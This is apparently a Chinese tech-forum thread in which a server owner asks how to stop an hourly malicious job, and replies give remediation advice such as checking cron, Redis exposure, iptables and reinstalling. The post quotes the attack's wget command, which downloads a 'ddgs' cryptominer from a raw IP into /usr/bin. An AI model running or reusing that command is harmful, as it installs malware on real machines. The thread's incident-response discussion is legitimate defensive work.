求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬
ying5201314 · 2020-04-18 11:15:18 +08:00 · 4944 次点击这是一个创建于 1667 天前的主题,其中的信息可能已经有所发展或是发生改变。
wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
ip 103.27.42.76 是日本
每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
没有找到定时任务
ip 103.27.42.76 是日本
每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
没有找到定时任务
27 条回复 • 2020-04-21 13:40:01 +08:00
 |
1
sadwin 2020-04-18 11:32:04 +08:00
有在跑 redis 吗? 有可能是 redis 被黑了
|
 |
2
Hurriance 2020-04-18 11:34:25 +08:00
redis 上密码
|
 |
3
renmu 2020-04-18 11:34:25 +08:00 via Android
cron 里没有?最好的方法就是重装系统
|
 |
4
claysec 2020-04-18 11:38:40 +08:00
没有重要东西就直接重装系统。
|
|
5
sadwin 2020-04-18 11:45:14 +08:00
|
 |
6
GGGG430 2020-04-18 11:45:57 +08:00  1
首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
其次可以通过 alias 重命名 wget 为其他命令 |
 |
7
cnzjl 2020-04-18 11:48:23 +08:00
最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令
|
 |
8
ik 2020-04-18 13:42:34 +08:00 via iPhone 1
建议重装,想排查问题可以先
> /usr/bin/uvggee chmod 000 /usr/bin/uvggee chattr +i /usr/bin/uvggee 然后再排查问题 |
 |
9
imdong 2020-04-18 14:23:47 +08:00 2
非专业,笨笨的方法:
比如自己写一个 shell 命名为 wget,然后在里面获取一些父进程信息? 然后用这个 shell 替换(覆盖) wget ?? |
 |
10
won 2020-04-18 14:32:35 +08:00 3
1 top 到进程号
2 ll 到执行位置 3 rm 掉 4 crontab 里删除,并添加一个 1 分钟守护 5 restart |
 |
11
i999999 2020-04-18 15:20:05 +08:00 via Android 1
建议重装系统,没办法重装的话可以把 wget 和 curl 工具重命名
|
 |
12
guog 2020-04-18 15:23:14 +08:00 via Android 1
七天了,楼主这个问题还没解决?大家给你的方案你试过了吗
|
 |
13
Rxianbei 2020-04-18 15:23:47 +08:00 via Android
@cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis,但是没有公网,装了都大半年了,想来也后怕,请问应该怎么排查?
|
 |
14
ying5201314 OP 试过了,主要不能重装,不然早解决
|
|
15
ying5201314 OP 试过了,主要不能重装,不然早解决 1
@guog |
 |
16
defunct9 2020-04-18 17:28:34 +08:00 via iPhone
开 ssh,让我上去看看
|
 |
17
xupefei 2020-04-18 17:30:06 +08:00 via iPhone
还有个可能是服务器跑了 yarn 。
|
 |
18
Guys 2020-04-18 17:51:04 +08:00
先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.
|
 |
19
musi 2020-04-18 17:51:28 +08:00
你在 v2 上发个求 d 帖把那个服务器 d 挂就好了
|
 |
20
xingheng 2020-04-18 19:34:05 +08:00
pstree 找到是哪个主进程启动的 wget,然后删除主进程的执行文件就行了吧。难道还有守护进程??尝试 watch+pstree 。
|
 |
21
patx 2020-04-18 19:43:31 +08:00
发到全球 ddos 论坛上去
|
 |
22
JustSong 2020-04-19 00:21:38 +08:00 via Android
可以用防火墙进行限制么
|
 |
23
Hades300 2020-04-19 07:13:04 +08:00 via Android
用 iptables drop 包就完事了
|
 |
24
msg7086 2020-04-19 17:49:41 +08:00 1
既然能写入 /usr/bin,那说明别人已经拿到了 root 权限,那从内核到系统文件,所有的程序都可能会被换掉,你不重装难道留着过劳动节么。
|
 |
25
realpg 2020-04-19 22:00:41 +08:00
我猜你是 centos
|
 |
27
zhao305149619 2020-04-21 13:40:01 +08:00
这种一般有 cron 的定时脚本,还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现,所以有时候发现把 cron 停掉之后过一会还是会出现。
|
Select Language